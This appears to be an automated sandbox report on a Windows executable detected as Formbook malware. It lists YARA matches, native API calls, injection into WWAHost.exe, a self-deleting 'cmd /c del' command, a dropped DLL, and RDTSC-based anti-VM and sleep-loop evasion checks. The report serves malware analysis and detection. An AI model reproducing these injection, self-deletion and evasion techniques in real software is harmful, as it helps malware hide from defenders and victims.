Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040312A
Detected potential crypto function
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_00406354 0_2_00406354
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_00404802 0_2_00404802
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_00406B2B 0_2_00406B2B
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_72915CF1 0_2_72915CF1
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_72915CE2 0_2_72915CE2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00401030 1_2_00401030
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_0041C8F4 1_2_0041C8F4
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_0041B8B3 1_2_0041B8B3
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_0041C266 1_2_0041C266
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_004012FB 1_2_004012FB
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00408C6B 1_2_00408C6B
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00408C70 1_2_00408C70
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_0041C431 1_2_0041C431
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00402D90 1_2_00402D90
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00402FB0 1_2_00402FB0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB20A0 1_2_00BB20A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9B090 1_2_00B9B090
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C528EC 1_2_00C528EC
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C520A8 1_2_00C520A8
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41002 1_2_00C41002
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C5E824 1_2_00C5E824
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA4120 1_2_00BA4120
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8F900 1_2_00B8F900
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C522AE 1_2_00C522AE
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBEBB0 1_2_00BBEBB0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4DBD2 1_2_00C4DBD2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C52B28 1_2_00C52B28
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4D466 1_2_00C4D466
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9841F 1_2_00B9841F
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C525DD 1_2_00C525DD
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2581 1_2_00BB2581
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9D5E0 1_2_00B9D5E0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C51D55 1_2_00C51D55
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B80D20 1_2_00B80D20
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C52D07 1_2_00C52D07
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387EBB0 7_2_0387EBB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03866E30 7_2_03866E30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03872581 7_2_03872581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385D5E0 7_2_0385D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384F900 7_2_0384F900
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03840D20 7_2_03840D20
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03864120 7_2_03864120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03911D55 7_2_03911D55
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385B090 7_2_0385B090
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901002 7_2_03901002
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385841F 7_2_0385841F
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0057C8F4 7_2_0057C8F4
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0057B8B3 7_2_0057B8B3
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0057C266 7_2_0057C266
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_00568C70 7_2_00568C70
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_00568C6B 7_2_00568C6B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0057C431 7_2_0057C431
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_00562D90 7_2_00562D90
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_00562FB0 7_2_00562FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 0384B150 appears 32 times
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: String function: 00B8B150 appears 34 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_004185D0 NtCreateFile, 1_2_004185D0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00418680 NtReadFile, 1_2_00418680
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00418700 NtClose, 1_2_00418700
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_004187B0 NtAllocateVirtualMemory, 1_2_004187B0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_004185CA NtCreateFile, 1_2_004185CA
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00418622 NtCreateFile, 1_2_00418622
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_004186FA NtClose, 1_2_004186FA
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_004187AA NtAllocateVirtualMemory, 1_2_004187AA
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC98F0 NtReadVirtualMemory,LdrInitializeThunk, 1_2_00BC98F0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9860 NtQuerySystemInformation,LdrInitializeThunk, 1_2_00BC9860
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9840 NtDelayExecution,LdrInitializeThunk, 1_2_00BC9840
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC99A0 NtCreateSection,LdrInitializeThunk, 1_2_00BC99A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 1_2_00BC9910
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9A20 NtResumeThread,LdrInitializeThunk, 1_2_00BC9A20
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9A00 NtProtectVirtualMemory,LdrInitializeThunk, 1_2_00BC9A00
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9A50 NtCreateFile,LdrInitializeThunk, 1_2_00BC9A50
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC95D0 NtClose,LdrInitializeThunk, 1_2_00BC95D0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9540 NtReadFile,LdrInitializeThunk, 1_2_00BC9540
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC96E0 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_00BC96E0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9660 NtAllocateVirtualMemory,LdrInitializeThunk, 1_2_00BC9660
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC97A0 NtUnmapViewOfSection,LdrInitializeThunk, 1_2_00BC97A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9780 NtMapViewOfSection,LdrInitializeThunk, 1_2_00BC9780
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9FE0 NtCreateMutant,LdrInitializeThunk, 1_2_00BC9FE0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9710 NtQueryInformationToken,LdrInitializeThunk, 1_2_00BC9710
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC98A0 NtWriteVirtualMemory, 1_2_00BC98A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9820 NtEnumerateKey, 1_2_00BC9820
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BCB040 NtSuspendThread, 1_2_00BCB040
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC99D0 NtCreateProcessEx, 1_2_00BC99D0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9950 NtQueueApcThread, 1_2_00BC9950
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9A80 NtOpenDirectoryObject, 1_2_00BC9A80
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9A10 NtQuerySection, 1_2_00BC9A10
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BCA3B0 NtGetContextThread, 1_2_00BCA3B0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9B00 NtSetValueKey, 1_2_00BC9B00
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC95F0 NtQueryInformationFile, 1_2_00BC95F0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BCAD30 NtSetContextThread, 1_2_00BCAD30
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9520 NtWaitForSingleObject, 1_2_00BC9520
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9560 NtWriteFile, 1_2_00BC9560
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889780 NtMapViewOfSection,LdrInitializeThunk, 7_2_03889780
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889FE0 NtCreateMutant,LdrInitializeThunk, 7_2_03889FE0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889710 NtQueryInformationToken,LdrInitializeThunk, 7_2_03889710
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038896D0 NtCreateKey,LdrInitializeThunk, 7_2_038896D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038896E0 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_038896E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889650 NtQueryValueKey,LdrInitializeThunk, 7_2_03889650
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889A50 NtCreateFile,LdrInitializeThunk, 7_2_03889A50
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889660 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_03889660
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038899A0 NtCreateSection,LdrInitializeThunk, 7_2_038899A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038895D0 NtClose,LdrInitializeThunk, 7_2_038895D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889910 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_03889910
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889540 NtReadFile,LdrInitializeThunk, 7_2_03889540
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889840 NtDelayExecution,LdrInitializeThunk, 7_2_03889840
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889860 NtQuerySystemInformation,LdrInitializeThunk, 7_2_03889860
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038897A0 NtUnmapViewOfSection, 7_2_038897A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0388A3B0 NtGetContextThread, 7_2_0388A3B0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889B00 NtSetValueKey, 7_2_03889B00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0388A710 NtOpenProcessToken, 7_2_0388A710
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889730 NtQueryVirtualMemory, 7_2_03889730
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889760 NtOpenProcess, 7_2_03889760
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889770 NtSetInformationFile, 7_2_03889770
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0388A770 NtOpenThread, 7_2_0388A770
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889A80 NtOpenDirectoryObject, 7_2_03889A80
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889A00 NtProtectVirtualMemory, 7_2_03889A00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889610 NtEnumerateValueKey, 7_2_03889610
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889A10 NtQuerySection, 7_2_03889A10
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889A20 NtResumeThread, 7_2_03889A20
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889670 NtQueryInformationProcess, 7_2_03889670
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038899D0 NtCreateProcessEx, 7_2_038899D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038895F0 NtQueryInformationFile, 7_2_038895F0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889520 NtWaitForSingleObject, 7_2_03889520
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0388AD30 NtSetContextThread, 7_2_0388AD30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889950 NtQueueApcThread, 7_2_03889950
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889560 NtWriteFile, 7_2_03889560
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038898A0 NtWriteVirtualMemory, 7_2_038898A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038898F0 NtReadVirtualMemory, 7_2_038898F0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889820 NtEnumerateKey, 7_2_03889820
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0388B040 NtSuspendThread, 7_2_0388B040
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_005785D0 NtCreateFile, 7_2_005785D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_00578680 NtReadFile, 7_2_00578680
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_00578700 NtClose, 7_2_00578700
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_005787B0 NtAllocateVirtualMemory, 7_2_005787B0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_005785CA NtCreateFile, 7_2_005785CA
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_00578622 NtCreateFile, 7_2_00578622
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_005786FA NtClose, 7_2_005786FA
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_005787AA NtAllocateVirtualMemory, 7_2_005787AA
Sample file is different than original file name gathered from version info
Source: DN_467842234567.exe, 00000000.00000003.671874971.000000000EA76000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs DN_467842234567.exe
Source: DN_467842234567.exe, 00000001.00000002.734746634.0000000000B16000.00000040.00020000.sdmp Binary or memory string: OriginalFilenameWWAHost.exej% vs DN_467842234567.exe
Source: DN_467842234567.exe, 00000001.00000002.735470838.0000000000C7F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs DN_467842234567.exe
Source: DN_467842234567.exe ReversingLabs: Detection: 64%
Source: C:\Users\user\Desktop\DN_467842234567.exe File read: C:\Users\user\Desktop\DN_467842234567.exe
Source: DN_467842234567.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\DN_467842234567.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\DN_467842234567.exe 'C:\Users\user\Desktop\DN_467842234567.exe'
Source: C:\Users\user\Desktop\DN_467842234567.exe Process created: C:\Users\user\Desktop\DN_467842234567.exe 'C:\Users\user\Desktop\DN_467842234567.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DN_467842234567.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DN_467842234567.exe Process created: C:\Users\user\Desktop\DN_467842234567.exe 'C:\Users\user\Desktop\DN_467842234567.exe'
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DN_467842234567.exe'
Source: C:\Users\user\Desktop\DN_467842234567.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\DN_467842234567.exe File created: C:\Users\user\AppData\Local\Temp\nslF1B.tmp
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/2@13/6
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar, 0_2_00402053
Source: C:\Users\user\Desktop\DN_467842234567.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004042C1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Binary string: WWAHost.pdb source: DN_467842234567.exe, 00000001.00000002.734645051.0000000000A60000.00000040.00020000.sdmp
Source: Binary string: WWAHost.pdbUGP source: DN_467842234567.exe, 00000001.00000002.734645051.0000000000A60000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: DN_467842234567.exe, 00000000.00000003.669973012.000000000EAF0000.00000004.00000001.sdmp, DN_467842234567.exe, 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, WWAHost.exe, 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: DN_467842234567.exe, WWAHost.exe

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\DN_467842234567.exe Unpacked PE file: 1.2.DN_467842234567.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_0040C845 push es; ret 1_2_0040C846
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_0041B87C push eax; ret 1_2_0041B882
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_0041B812 push eax; ret 1_2_0041B818
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_0041B81B push eax; ret 1_2_0041B882
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_004172E9 push edx; retf 1_2_004172EE
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00418AE8 push ds; retf 1_2_00418AED
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_0041B7C5 push eax; ret 1_2_0041B818
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BDD0D1 push ecx; ret 1_2_00BDD0E4
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0389D0D1 push ecx; ret 7_2_0389D0E4
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0056C845 push es; ret 7_2_0056C846
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0057B87C push eax; ret 7_2_0057B882
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0057B812 push eax; ret 7_2_0057B818
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0057B81B push eax; ret 7_2_0057B882
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_005772E9 push edx; retf 7_2_005772EE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_00578AE8 push ds; retf 7_2_00578AED
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0057B7C5 push eax; ret 7_2_0057B818
Source: initial sample Static PE information: section name: .data entropy: 7.77743167322

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\DN_467842234567.exe File created: C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: /c del 'C:\Users\user\Desktop\DN_467842234567.exe'
Source: C:\Users\user\Desktop\DN_467842234567.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WWAHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\DN_467842234567.exe RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DN_467842234567.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 00000000005685F4 second address: 00000000005685FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 000000000056898E second address: 0000000000568994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5152 Thread sleep time: -55000s >= -30000s
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 7076 Thread sleep time: -46000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_004088C0 rdtsc 1_2_004088C0
Source: C:\Users\user\Desktop\DN_467842234567.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_00405EC2 FindFirstFileA,FindClose, 0_2_00405EC2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_004054EC
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_00402671 FindFirstFileA, 0_2_00402671
Source: explorer.exe, 00000004.00000000.718727163.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.715398988.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.700136697.000000000A716000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATAa
Source: explorer.exe, 00000004.00000000.692764145.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000004.00000000.700657795.000000000A897000.00000004.00000001.sdmp Binary or memory string: 6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}WW
